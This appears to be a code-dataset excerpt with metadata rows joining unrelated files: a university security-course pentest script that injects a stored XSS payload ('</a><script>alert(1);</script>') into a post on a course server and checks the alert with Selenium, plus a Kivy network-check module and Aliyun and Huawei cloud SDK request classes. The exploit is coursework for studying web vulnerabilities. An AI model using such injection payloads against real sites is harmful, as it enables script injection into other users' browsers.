"MIT"
] | null | null | null | project_1/pentest/vuln2.py | BFreitas16/SSof | c6963b76c1c033324593a40139e5918ad6386380 | [
"MIT"
] | null | null | null | project_1/pentest/vuln2.py | BFreitas16/SSof | c6963b76c1c033324593a40139e5918ad6386380 | [
"MIT"
] | null | null | null | import requests, sys, os, random
import time
from bs4 import BeautifulSoup
from selenium_utils import start_driver, write_to_field
SERVER = sys.argv[1]
# SERVER = 'http://d39e092608f9769e2696bf07d987072b4b2dd1dc9bce5e0151910fc276ae.project.ssof.rnl.tecnico.ulisboa.pt/'
session = requests.session()
# Random user credentials
user = str(random.randint(2**27, 2**28))
password = str(random.randint(2**27, 2**28))
# Registration of the user
params = {'password' : password, 'username' : user}
r = session.post(SERVER + '/register', data=params)
# Login of the user
params = {'password' : password, 'username' : user}
r = session.post(SERVER + '/login', data=params, cookies=session.cookies)
# Create a new post
params = {}
headers = {'user-agent': 'my-app/0.0.1', 'Content-Type': 'application/json'}
r = requests.get(SERVER + '/create_post', params=params, headers=headers, cookies=session.cookies)
params = {'content' : 'New Post', 'type' : 'Public'}
r = session.post(SERVER + '/create_post', data=params, cookies=session.cookies)
# Edit the newly created post
r = requests.get(SERVER, params={}, headers=headers, cookies=session.cookies)
soup = BeautifulSoup(r.text, 'html.parser')
created_post_id = int(soup.find_all('input')[0]['value'])
content = '</a><script>alert(1);</script>'
payload = {
'id': created_post_id,
'content': content,
'type': 'Public'
}
r = session.post(SERVER + '/edit_post', data=payload, cookies=session.cookies)
# Use Selenium to check for the alert
driver = start_driver()
driver.get(SERVER)
# Login
write_to_field(driver, 'username', user)
write_to_field(driver, 'password', password + '\n')
# Verify and Handle alert
alert = driver.switch_to.alert
time.sleep(1)
assert "1" in alert.text
alert.accept()
# Close Chrome
driver.close() | 30.220339 | 117 | 0.719574 |
79548b3b4245cb395a275c85e4e32b13c388fc3b | 644 | py | Python | src/netcheck/__init__.py | vincentdavis/Encrypted-Twitter-Messager | b43f553c26a733496a0a445d04d14aeb40e492f7 | [
"MIT"
] | null | null | null | src/netcheck/__init__.py | vincentdavis/Encrypted-Twitter-Messager | b43f553c26a733496a0a445d04d14aeb40e492f7 | [
"MIT"
] | null | null | null | src/netcheck/__init__.py | vincentdavis/Encrypted-Twitter-Messager | b43f553c26a733496a0a445d04d14aeb40e492f7 | [
"MIT"
] | null | null | null | from kivy import platform
__all__ = ('connection_available', 'set_retry_prompt', 'ask_connect',
'_get_ref')
_Netcheck = None
def _netcheck():
global _Netcheck
if _Netcheck is None:
p = platform()
if p == 'android':
from androidconn import Netcheck
else:
from mockconn import Netcheck
_Netcheck = Netcheck()
return _Netcheck
def connection_available():
return _netcheck().connection_available()
def set_prompt(fn):
_netcheck().set_prompt(fn)
def ask_connect(callback):
_netcheck().ask_connect(callback)
def _get_ref():
return _netcheck()
| 18.4 | 69 | 0.653727 |
79548c4249822c18909fdb16d4b915cf0802d8e6 | 1,936 | py | Python | aliyun-python-sdk-mts/aliyunsdkmts/request/v20140618/QueryPornPipelineListRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | 1 | 2019-12-23T12:36:43.000Z | 2019-12-23T12:36:43.000Z | aliyun-python-sdk-mts/aliyunsdkmts/request/v20140618/QueryPornPipelineListRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-mts/aliyunsdkmts/request/v20140618/QueryPornPipelineListRequest.py | liumihust/aliyun-openapi-python-sdk | c7b5dd4befae4b9c59181654289f9272531207ef | [
"Apache-2.0"
] | 1 | 2021-02-23T11:27:54.000Z | 2021-02-23T11:27:54.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class QueryPornPipelineListRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Mts', '2014-06-18', 'QueryPornPipelineList','mts')
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_PipelineIds(self):
return self.get_query_params().get('PipelineIds')
def set_PipelineIds(self,PipelineIds):
self.add_query_param('PipelineIds',PipelineIds)
def get_OwnerAccount(self):
return self.get_query_params().get('OwnerAccount')
def set_OwnerAccount(self,OwnerAccount):
self.add_query_param('OwnerAccount',OwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | 35.851852 | 80 | 0.775826 |
79548ce44174ecb00eede427c249a3630f79692d | 9,463 | py | Python | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/list_rule_actions_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/list_rule_actions_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/list_rule_actions_request.py | wuchen-huawei/huaweicloud-sdk-python-v3 | 3683d703f4320edb2b8516f36f16d485cff08fc2 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import pprint
import re
import six
class ListRuleActionsRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'instance_id': 'str',
'rule_id': 'str',
'channel': 'str',
'app_type': 'str',
'app_id': 'str',
'limit': 'int',
'marker': 'str',
'offset': 'int'
}
attribute_map = {
'instance_id': 'Instance-Id',
'rule_id': 'rule_id',
'channel': 'channel',
'app_type': 'app_type',
'app_id': 'app_id',
'limit': 'limit',
'marker': 'marker',
'offset': 'offset'
}
def __init__(self, instance_id=None, rule_id=None, channel=None, app_type=None, app_id=None, limit=None, marker=None, offset=None):
"""ListRuleActionsRequest - a model defined in huaweicloud sdk"""
self._instance_id = None
self._rule_id = None
self._channel = None
self._app_type = None
self._app_id = None
self._limit = None
self._marker = None
self._offset = None
self.discriminator = None
if instance_id is not None:
self.instance_id = instance_id
if rule_id is not None:
self.rule_id = rule_id
if channel is not None:
self.channel = channel
if app_type is not None:
self.app_type = app_type
if app_id is not None:
self.app_id = app_id
if limit is not None:
self.limit = limit
if marker is not None:
self.marker = marker
if offset is not None:
self.offset = offset
@property
def instance_id(self):
"""Gets the instance_id of this ListRuleActionsRequest.
实例ID。物理多租下各实例的唯一标识,一般华为云租户无需携带该参数,仅在物理多租场景下从管理面访问API时需要携带该参数。
:return: The instance_id of this ListRuleActionsRequest.
:rtype: str
"""
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id):
"""Sets the instance_id of this ListRuleActionsRequest.
实例ID。物理多租下各实例的唯一标识,一般华为云租户无需携带该参数,仅在物理多租场景下从管理面访问API时需要携带该参数。
:param instance_id: The instance_id of this ListRuleActionsRequest.
:type: str
"""
self._instance_id = instance_id
@property
def rule_id(self):
"""Gets the rule_id of this ListRuleActionsRequest.
规则触发条件ID。
:return: The rule_id of this ListRuleActionsRequest.
:rtype: str
"""
return self._rule_id
@rule_id.setter
def rule_id(self, rule_id):
"""Sets the rule_id of this ListRuleActionsRequest.
规则触发条件ID。
:param rule_id: The rule_id of this ListRuleActionsRequest.
:type: str
"""
self._rule_id = rule_id
@property
def channel(self):
"""Gets the channel of this ListRuleActionsRequest.
规则动作的类型,取值范围: - HTTP_FORWARDING:HTTP服务消息类型。 - DIS_FORWARDING:转发DIS服务消息类型。 - OBS_FORWARDING:转发OBS服务消息类型。 - AMQP_FORWARDING:转发AMQP服务消息类型。 - DMS_KAFKA_FORWARDING:转发kafka消息类型。
:return: The channel of this ListRuleActionsRequest.
:rtype: str
"""
return self._channel
@channel.setter
def channel(self, channel):
"""Sets the channel of this ListRuleActionsRequest.
规则动作的类型,取值范围: - HTTP_FORWARDING:HTTP服务消息类型。 - DIS_FORWARDING:转发DIS服务消息类型。 - OBS_FORWARDING:转发OBS服务消息类型。 - AMQP_FORWARDING:转发AMQP服务消息类型。 - DMS_KAFKA_FORWARDING:转发kafka消息类型。
:param channel: The channel of this ListRuleActionsRequest.
:type: str
"""
self._channel = channel
@property
def app_type(self):
"""Gets the app_type of this ListRuleActionsRequest.
租户规则的生效范围,取值如下: - GLOBAL:生效范围为租户级 - APP:生效范围为资源空间级。如果类型为APP,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:return: The app_type of this ListRuleActionsRequest.
:rtype: str
"""
return self._app_type
@app_type.setter
def app_type(self, app_type):
"""Sets the app_type of this ListRuleActionsRequest.
租户规则的生效范围,取值如下: - GLOBAL:生效范围为租户级 - APP:生效范围为资源空间级。如果类型为APP,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:param app_type: The app_type of this ListRuleActionsRequest.
:type: str
"""
self._app_type = app_type
@property
def app_id(self):
"""Gets the app_id of this ListRuleActionsRequest.
资源空间ID。此参数为非必选参数,rule_id不携带且app_type为APP时,该参数生效,可携带app_id查询指定资源空间下的规则动作列表,不携带app_id则查询[默认资源空间](https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0)下的规则动作列表。
:return: The app_id of this ListRuleActionsRequest.
:rtype: str
"""
return self._app_id
    @app_id.setter
    def app_id(self, app_id):
        """Sets the app_id of this ListRuleActionsRequest.

        Resource space ID. Optional; it takes effect only when rule_id is not
        provided and app_type is APP. Pass app_id to list rule actions in the
        specified resource space; without app_id, the default resource space
        is queried
        (https://support.huaweicloud.com/usermanual-iothub/iot_01_0006.html#section0).

        :param app_id: The app_id of this ListRuleActionsRequest.
        :type: str
        """
        self._app_id = app_id
    @property
    def limit(self):
        """Gets the limit of this ListRuleActionsRequest.

        Number of records returned per page. Defaults to 10, at most 50 per
        page; an integer in the range 1-50.

        :return: The limit of this ListRuleActionsRequest.
        :rtype: int
        """
        return self._limit
    @limit.setter
    def limit(self, limit):
        """Sets the limit of this ListRuleActionsRequest.

        Number of records returned per page. Defaults to 10, at most 50 per
        page; an integer in the range 1-50.

        :param limit: The limit of this ListRuleActionsRequest.
        :type: int
        """
        self._limit = limit
    @property
    def marker(self):
        """Gets the marker of this ListRuleActionsRequest.

        ID of the last record in the previous page, as returned by the IoT
        platform in the previous paged query. The platform pages in descending
        record-ID order (newer records have larger IDs). If marker is given,
        only records with IDs smaller than marker are returned; if omitted,
        the query starts from the newest record. To walk through all data,
        pass the marker from each response into the next request.

        :return: The marker of this ListRuleActionsRequest.
        :rtype: str
        """
        return self._marker
    @marker.setter
    def marker(self, marker):
        """Sets the marker of this ListRuleActionsRequest.

        ID of the last record in the previous page, as returned by the IoT
        platform in the previous paged query. The platform pages in descending
        record-ID order (newer records have larger IDs). If marker is given,
        only records with IDs smaller than marker are returned; if omitted,
        the query starts from the newest record. To walk through all data,
        pass the marker from each response into the next request.

        :param marker: The marker of this ListRuleActionsRequest.
        :type: str
        """
        self._marker = marker
    @property
    def offset(self):
        """Gets the offset of this ListRuleActionsRequest.

        Number of records to skip after marker before output starts. Defaults
        to 0; an integer in the range 0-500. With offset 0, output starts at
        the first record after marker.
        - The cap of 500 exists for API performance. Combine offset with
          marker to paginate: e.g. with 50 records per page, pages 1-11 can be
          reached with offset alone; beyond that, use page 11's marker as the
          next query's marker to reach pages 12-22.

        :return: The offset of this ListRuleActionsRequest.
        :rtype: int
        """
        return self._offset
    @offset.setter
    def offset(self, offset):
        """Sets the offset of this ListRuleActionsRequest.

        Number of records to skip after marker before output starts. Defaults
        to 0; an integer in the range 0-500. With offset 0, output starts at
        the first record after marker.
        - The cap of 500 exists for API performance. Combine offset with
          marker to paginate: e.g. with 50 records per page, pages 1-11 can be
          reached with offset alone; beyond that, use page 11's marker as the
          next query's marker to reach pages 12-22.

        :param offset: The offset of this ListRuleActionsRequest.
        :type: int
        """
        self._offset = offset
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
    def __repr__(self):
        """Return the printable representation (used by `print` and `pprint`)."""
        return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListRuleActionsRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 31.543333 | 233 | 0.632886 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.